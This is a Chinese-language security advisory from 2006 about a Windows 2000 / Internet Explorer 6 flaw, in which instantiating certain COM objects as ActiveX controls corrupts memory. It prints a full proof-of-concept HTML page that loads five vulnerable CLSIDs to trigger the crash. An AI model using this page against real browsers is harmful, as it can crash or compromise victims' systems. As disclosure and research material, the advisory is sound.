首页 -> 安全研究

安全研究

安全漏洞
Microsoft Windows 2000多个COM对象实例化内存破坏漏洞

发布日期:2006-08-21
更新日期:2006-08-22

受影响系统:
Microsoft Internet Explorer 6.0 SP1
    - Microsoft Windows 2000
描述:
BUGTRAQ  ID: 19640

Microsoft Windows是微软发布的非常流行的操作系统。

在Windows 2000上当Internet Explorer试图将ciodm.dll、MyInfo.dll、msdxm.ocx、Creator.dll(Media player 9)COM对象实例化为ActiveX控件时,就可能破坏系统内存,导致拒绝服务或执行任意代码。

<*来源:XSec (http://www.xsec.org)
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=115618189915822&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

=============== 2000obj.htm start ================

<!--

// Windows 2000 Multiple COM Object Instantiation Vulnerability
// tested on Windows 2000 SP4 CN

// http://www.xsec.org
// nop (nop#xsec.org)

--!>
<html>
<head>
<title>COM-tester</title>
</head>
</body>
<script>
var i =0;
var clsid = new Array(

// NO: 1
// CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}
// Info: Microsoft Index Server Catalog Administration Object
// ProgID: Microsoft.ISCatAdm.1
// InprocServer32: C:\WINNT\system32\ciodm.dll
"{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}",

// NO: 2
// CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9}
// Info: MyInfo ASP Component// ProgID: MSWC.MyInfo.1
// InprocServer32: C:\WINNT\system32\inetsrv\MyInfo.dll
"{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}",


// NO: 3
// CLSID: {8E71888A-423F-11D2-876E-00A0C9082467}
// Info: RadioServer Class
// ProgID: Mmedia.RadioServer.1
// InprocServer32: C:\WINNT\system32\msdxm.ocx
"{8E71888A-423F-11D2-876E-00A0C9082467}",


// NO: 4 media player?
// CLSID: {606EF130-9852-11D3-97C6-0060084856D4}
// Info: CdCreator Class// ProgID: Creator.CdCreator.1
// InprocServer32: C:\Program Files\Common Files\Adaptec
Shared\CreatorAPI\creator.dll
"{606EF130-9852-11D3-97C6-0060084856D4}",

// NO: 5 media player?
// CLSID: {F849164D-9863-11D3-97C6-0060084856D4}
// Info: CdDevice Class// ProgID: Creator.CdDevice.1
// InprocServer32: C:\Program Files\Common Files\Adaptec
Shared\CreatorAPI\creator.dll
"{F849164D-9863-11D3-97C6-0060084856D4}",

// END
null
);

while(clsid[i])
{
var a = document.createElement("object");

window.status = "Testing Object " + clsid[i] + "...";

a.setAttribute("classid", "clsid:" + clsid[i]);

i++;
}

window.status = "failed!";

</script>
</body>
</html>

=============== 2000obj.htm end ==================

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:3295
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障